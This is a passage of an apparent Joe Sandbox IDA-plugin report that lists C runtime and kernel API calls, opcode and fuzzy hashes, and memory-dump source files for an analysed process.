                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4271482742-0
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                            APIs
                                                                                                                                            • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                            • __locking.LIBCMT ref: 0040C791
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2395185920-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _fseek_malloc_memset
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 208892515-0
                                                                                                                                            APIs
                                                                                                                                            • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                            • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                            • __locking.LIBCMT ref: 0040BB95
                                                                                                                                            • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3240763771-0
                                                                                                                                            • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                            • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                            • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                            • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                            APIs
                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                            • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3731530309.000000000043F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_jphwmyiA.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3016257755-0
                                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                            • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89